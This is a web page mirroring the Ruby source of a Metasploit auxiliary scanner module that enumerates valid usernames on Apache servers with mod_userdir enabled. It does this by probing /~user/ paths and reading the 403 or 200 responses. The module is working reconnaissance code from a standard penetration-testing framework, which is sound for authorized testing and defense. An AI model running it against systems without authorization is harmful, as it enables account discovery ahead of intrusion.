Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/apache_userdir_enum.rb
19611 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
include Msf::Auxiliary::Report
9
include Msf::Auxiliary::Scanner
10
include Msf::Auxiliary::AuthBrute
11
12
def initialize
13
super(
14
'Name' => 'Apache "mod_userdir" User Enumeration',
15
'Description' => %q{Apache with the UserDir directive enabled generates different error
16
codes when a username exists and there is no public_html directory and when the username
17
does not exist, which could allow remote attackers to determine valid usernames on the
18
server.},
19
'Author' => [
20
'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
21
],
22
'References' => [
23
['BID', '3335'],
24
['CVE', '2001-1013'],
25
['OSVDB', '637'],
26
],
27
'License' => MSF_LICENSE
28
)
29
30
register_options(
31
[
32
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
33
OptPath.new('USER_FILE', [
34
true, "File containing users, one per line",
35
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt")
36
]),
37
]
38
)
39
40
deregister_options(
41
'PASSWORD',
42
'PASS_FILE',
43
'USERPASS_FILE',
44
'STOP_ON_SUCCESS',
45
'BLANK_PASSWORDS',
46
'USER_AS_PASS'
47
)
48
end
49
50
def run_host(ip)
51
@users_found = {}
52
53
each_user_pass { |user, pass|
54
do_login(user)
55
}
56
57
if (@users_found.empty?)
58
print_status("#{full_uri} - No users found.")
59
else
60
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
61
report_note(
62
:host => rhost,
63
:port => rport,
64
:proto => 'tcp',
65
:sname => (ssl ? 'https' : 'http'),
66
:type => 'users',
67
:data => { :users => @users_found.keys.join(", ") }
68
)
69
end
70
end
71
72
def do_login(user)
73
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
74
uri = normalize_uri(target_uri.path)
75
payload = "#{uri}~#{user}/"
76
begin
77
res = send_request_cgi!(
78
{
79
'method' => 'GET',
80
'uri' => payload,
81
'ctype' => 'text/plain'
82
}, 20
83
)
84
85
return unless res
86
87
if ((res.code == 403) or (res.code == 200))
88
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
89
@users_found[user] = :reported
90
else
91
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
92
end
93
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
94
rescue ::Timeout::Error, ::Errno::EPIPE
95
end
96
end
97
end
98
99